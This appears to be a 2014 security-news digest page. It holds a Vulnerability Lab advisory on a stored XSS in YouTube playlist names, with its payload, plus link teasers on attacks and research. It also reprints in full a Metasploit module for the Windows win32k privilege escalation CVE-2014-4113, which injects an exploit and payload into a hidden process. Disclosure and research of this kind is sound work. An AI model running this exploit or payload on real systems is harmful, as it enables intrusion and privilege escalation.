Channel: BOT24

Google Youtube - Filter Bypass & Persistent Vulnerability [9-5942000004564] (PoC Video Demonstration)

Document Title:
===============
Google Youtube - Filter Bypass & Persistent Vulnerability [9-5942000004564] (PoC Video Demonstration)


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1352

Google Security ID: [9-5942000004564]

View: https://www.youtube.com/watch?v=656LM9zGLxc

Article: http://vulnerability-db.com/magazine/articles/2014/10/25/google-youtube-persistent-cross-site-vulnerability-demonstration-video


Release Date:
=============
2014-10-25


Vulnerability Laboratory ID (VL-ID):
====================================
1352


Common Vulnerability Scoring System:
====================================
3.9


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Offensive


Severity Level:
===============
Medium


Technical Details & Description:
================================
The independent vulnerability researcher Jasminder Pal has discovered a persistent cross-site scripting vulnerability in the Google YouTube UI.
By using a filter bypass method, the issue becomes exploitable in the different application layers that are connected to the vulnerable values.
Google Security sent a reward of $1337 to the researcher who discovered the vulnerability during the official bug bounty program.

Reproduction Steps:
1. Create a playlist named [ t" onmouseover=alert(/xss/); a=" ] (without the square brackets).
2. The JavaScript in the playlist name then executes in several places.
One is the video editor: click Edit on any of your uploaded videos, then click Add to Playlist on the editor page.
When you move the mouse over the playlist name, the code above executes.
Another location is the upload flow: when a YouTube user uploads a video, the page asks whether to add it to a playlist, and the same code executes there.
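The defect these steps exercise is a stored value (the playlist name) being written into an HTML attribute without attribute-context encoding, so the embedded quote closes the attribute and the rest of the name becomes a new event-handler attribute. The following is an added illustration, not code from the advisory or from YouTube: it renders the same constructed playlist name both by raw concatenation and with entity escaping, and includes a small attribute-counting check that a reviewer or test suite can run over rendered markup to catch the break-out. All function names are assumptions for the example.

```javascript
// Added example (not from the advisory). Shows why the playlist name breaks
// out of an HTML attribute and how attribute-context escaping neutralises it.

// Constructed sample: the playlist name from the advisory's reproduction step.
const PLAYLIST_NAME = 't" onmouseover=alert(/xss/); a="';

// Vulnerable pattern: raw concatenation into an attribute value. The quote in
// the name closes the attribute early; what follows is parsed as new attributes.
function renderUnsafe(name) {
  return '<li title="' + name + '">' + name + '</li>';
}

// Escape for HTML attribute and text context: every character that can end a
// quoted attribute value or start a tag or entity is replaced by its entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed pattern: the same markup, with the untrusted value escaped on output.
// (In a browser, setting el.title / el.textContent via the DOM API avoids the
// string-building entirely and is preferable.)
function renderSafe(name) {
  const e = escapeHtml(name);
  return '<li title="' + e + '">' + e + '</li>';
}

// Structural check for a review or a unit test: list the attribute names of
// the first tag. A single untrusted value must never yield more than the
// attributes the template itself declares (here: just "title").
function attributeNames(html) {
  const tag = html.match(/^<\w+([^>]*)>/);
  if (!tag) return [];
  const names = [];
  const attr = /\s([a-zA-Z][\w-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)/g;
  let m;
  while ((m = attr.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Stand-alone run: the unsafe render grows an onmouseover attribute, the safe
// render keeps exactly the one attribute the template declares.
console.log('unsafe:', attributeNames(renderUnsafe(PLAYLIST_NAME)));
console.log('safe:  ', attributeNames(renderSafe(PLAYLIST_NAME)));
```

The attribute-count check is deliberately crude (a regex over one tag, not an HTML parser); it is meant as a cheap regression guard in a template's test suite, while the real fix is the escaping, or a templating engine that applies it by default.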


Credits & Authors:
==================
Jasminder Pal Singh - @singh_jasminder [http://jasminderpalsingh.info]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

PHP htaccess injection cheat sheet

Scenario
In an Apache/mod_php setup, an attacker is able to inject a .htaccess file (or a php.ini or Apache configuration file). The injection directory has AllowOverride Options set (or AllowOverride All, which is also very common).

more here...........https://github.com/sektioneins/pcc/wiki/PHP-htaccess-injection-cheat-sheet

Closures, Objects, and the Fauna of the Heap

The last post in this series looks at closures, objects, and other creatures roaming beyond the stack. Much of what we’ll see is language neutral, but I’ll focus on JavaScript with a dash of C.

more here........http://duartes.org/gustavo/blog/post/closures-objects-heap/

Crypto-Ransomware Running Rampant

There's no doubt that ransomware is one of the most popular malware threats of 2014. Zscaler is not alone in this opinion, as other security firms have observed up to a 700% increase in infection rates to ransom-like malicious activity on victim PCs. It's no wonder the attacks are so effective when, for example, the delivery mechanism is designed to impersonate a legitimate service such as a harmless eFax.

more here..........http://research.zscaler.com/2014/10/crypto-ransomware-running-rampant.html

ASP Backdoors? Sure! It’s not just about PHP

I recently came to the realization that it might appear that we’re partial to PHP and WordPress. This realization has brought about an overwhelming need to correct that perception. While they do make up an interesting percentage, there are various other platforms and languages that have similar if not more devastating implications.

Take into consideration Microsoft ASP and Windows IIS Web Servers. They too share their burden of infections, yet we don’t give it, rather share, as much as we probably should.

more here.........http://blog.sucuri.net/2014/10/asp-backdoors-its-not-all-about-php.html

TSX improves timing attacks against KASLR

Mega biblion mega kakon…
… and similarly a long blog is a nuisance, so I managed to squeeze the essence of it into a single sentence, the title. If it is not entirely clear, read on.

more here.................http://labs.bromium.com/2014/10/27/tsx-improves-timing-attacks-against-kaslr/

Men’s Wearhouse Perfect Fit App Vulnerability Exposing Customer Information

Men’s Wearhouse offers an Android app called Perfect Fit which allows customers to manage their accounts, track their rewards points, receive coupons, etc. As a customer myself, I already had an account with them and decided to review the requests the app was making while logging in and accessing my information. In doing so, I immediately identified a flaw in their web service’s authentication/session management that exposed the personal information of all of their customers with Perfect Fit accounts.

more here...........http://randywestergren.com/mens-wearhouse-perfect-fit-app-vulnerability-exposing-customer-information/

Paper: Mayhem in the Push Clouds: Understanding and Mitigating Security Hazards in Mobile Push-Messaging Services

Push messaging is among the most important mobile-cloud services, offering critical support to a wide spectrum of mobile apps. This service needs to coordinate complicated interactions between developer servers and their apps at a large scale, making it error prone. Despite its importance, little has been done, however, to understand the security risks of the service. In this paper, we report the first security analysis of those push-messaging services, which reveals the pervasiveness of subtle yet significant security flaws in them, affecting billions of mobile users.

more here.............http://homes.soic.indiana.edu/zhou/files/mobile_cloud.pdf

ScanBox framework – who’s affected, and who’s using it?

Earlier this year the Japanese-language website of one of the world’s largest suppliers of industrial equipment was compromised by a sophisticated threat actor. Usually in such cases an attacker will use their access to place an exploit kit on the compromised website, delivering malware to visitors, a technique commonly referred to as setting up a ‘watering hole’ or ‘strategic web compromise’. In this case, however, rather than relying on malware, the exploit kit was a self-contained key logger that recorded all keystrokes the user performed while on the website. AlienVault[1] produced an excellent write-up on this framework, which the developers named ScanBox.

more here.........http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html

Kaspersky Hooking Engine Analysis

In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen is Kaspersky PURE 3.0 Total Security (http://www.kaspersky.com/it/trials); we will deal with various hooking techniques used both in user mode and in kernel mode.

more here.........https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/

Dorothy 2- A malware/botnet analysis framework written in Ruby.

Dorothy2 is a framework created for suspicious binary analysis. Its main strengths are a very flexible modular environment and an interactive investigation framework with particular care for network analysis. Additionally, it is able to recognise newly spawned processes by comparing them with a previously created baseline.

more here.........https://github.com/m4rco-/dorothy2

Cisco ASA SSL VPN Backdoor PoC (CVE-2014-3393)

A coworker and I recently had the opportunity to work with a new vulnerability released at Ruxcon just earlier this month and while we didn't get exactly what we wanted, it was quite interesting.

The conference presentation was titled "Breaking Bricks and Plumbing Pipes: Cisco ASA a Super Mario Adventure" https://ruxcon.org.au/assets/2014/slides/Breaking%20Bricks%20Ruxcon%202014.pdf and was EXTREMELY interesting. The researcher Alec Stuart-Muirk managed to "jailbreak" the ASA and from there do some cool things with it, including a code audit of the publicly facing SSL VPN interface.

more here..........http://breenmachine.blogspot.ca/2014/10/cisco-asa-ssl-vpn-backdoor-poc-cve-2014.html

Memtools Vita 0.3beta (untested)

Allows developers to play with the Vita's WebKit process memory by leveraging a WebKit vuln

more here........https://github.com/BrianBTB/memtools_vita

Metasploit: Windows TrackPopupMenu Win32k NULL Pointer Dereference

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
      'Description'    => %q{
        This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
        can be triggered through the use of TrackPopupMenu. Under special conditions, the
        NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
        code execution. This module has been tested successfully on Windows XP SP3, Windows
        2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
        2008 R2 SP1 64 bits.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # vulnerability discovery and exploit in the wild
          'juan vazquez', # msf module (x86 target)
          'Spencer McIntyre' # msf module (x64 target)
        ],
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          # Tested on (32 bits):
          # * Windows XP SP3
          # * Windows 2003 SP2
          # * Windows 7 SP1
          # * Windows 2008
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          # Tested on (64 bits):
          # * Windows 7 SP1
          # * Windows 2008 R2 SP1
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'Payload'         =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'      =>
        [
          ['CVE', '2014-4113'],
          ['OSVDB', '113167'],
          ['BID', '70364'],
          ['MSB', 'MS14-058'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
        ],
      'DisclosureDate' => 'Oct 14 2014',
      'DefaultTarget'  => 0
    }))
  end

  def check
    os = sysinfo["OS"]

    if os !~ /windows/i
      return Exploit::CheckCode::Unknown
    end

    if sysinfo["Architecture"] =~ /(wow|x)64/i
      arch = ARCH_X86_64
    elsif sysinfo["Architecture"] =~ /x86/i
      arch = ARCH_X86
    end

    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    # Neither target supports Windows 8 (build 9200) or 8.1 (build 9600)
    return Exploit::CheckCode::Safe if build == 9200
    return Exploit::CheckCode::Safe if build == 9600

    if arch == ARCH_X86
      return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
    else
      return Exploit::CheckCode::Detected if build == 7601
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    print_status('Launching notepad to host the exploit...')
    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Reader Sandbox won't allow to create a new process:
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    if target.arch.first == ARCH_X86
      dll_file_name = 'cve-2014-4113.x86.dll'
    else
      dll_file_name = 'cve-2014-4113.x64.dll'
    end

    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end

end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Dubious MIME - Conflicting Content-Transfer-Encoding

Because of different interpretations of standards in mail clients, IDS/IPS and antivirus products, it is possible to pass malware undetected to the end user. This is especially funny and dangerous if different interpretations happen inside a single product, like in Yahoo! Web Mail.

more here.........http://noxxi.de/research/content-transfer-encoding.html

Fireeye Report: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?

Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has long been a whispered frontrunner among capable nations for performing sophisticated network operations. This perception is due in part to the Russian government’s alleged involvement in the cyber attacks accompanying its invasion of Georgia in 2008, as well as the rampant speculation that Moscow was behind a major U.S. Department of Defense network compromise, also in 2008. These rumored activities, combined with a dearth of hard evidence, have made Russia into something of a phantom in cyberspace.

more here..........http://www.fireeye.com/resources/pdfs/apt28.pdf

Foxtrot

A simple and secure routing network based on bitcoin cryptography. Foxtrot enables easy p2p communications and has built-in mechanisms for peer discovery, creation of services addressable by public keys, and establishing encrypted connections.

more here........https://github.com/bitpay/foxtrot

Hacking a Reporter: UK Edition

Over the summer, a U.K. journalist asked the Trustwave SpiderLabs team to target her with an online attack. You might remember that we did the same in 2013 by setting our sights on a U.S.-based reporter.

This scenario, however, would differ from the first. The reporter, Sophie, was our only target. Co-workers, company or family were off limits. Sophie wrote about the experience from her perspective here. Below, we’ll tell the story from the perspective of Trustwave SpiderLabs, playing the role of “theoretical” attacker.

more here.........http://blog.spiderlabs.com/2014/10/hacking-a-reporter-uk-edition.html

CryptoAttacker

CryptoAttacker helps detect and exploit some common crypto flaws.

Active Scanning to detect padding Oracle attacks
Active Scanning capabilities to detect input being encrypted with ECB and reflected back (can be slow)
Attack tab to encrypt/decrypt padding oracles
Attack tab to decrypt ECB where you control part of the request

more here.......https://github.com/webstersprodigy/webstersprodigy/tree/master/burp/cryptoAttack

CVE-2014-2718: ASUS wireless router updates vulnerable to a Man in the Middle attack

Over the past few months I have come across a couple of significant issues with ASUS wireless routers (which to their credit the company has been quick to resolve).

In mid February, I wrote that a substantial portion of ASUS wireless routers would fail to update their firmware. In fact, the "check for update" function would inform the administrator that the router was fully up-to-date, even though it was not. The timing could not have been worse, coming right on the heels of an exploit for a bug in which USB hard drives connected to the router could be accessed from the public Internet, with no login required.

more here.........http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html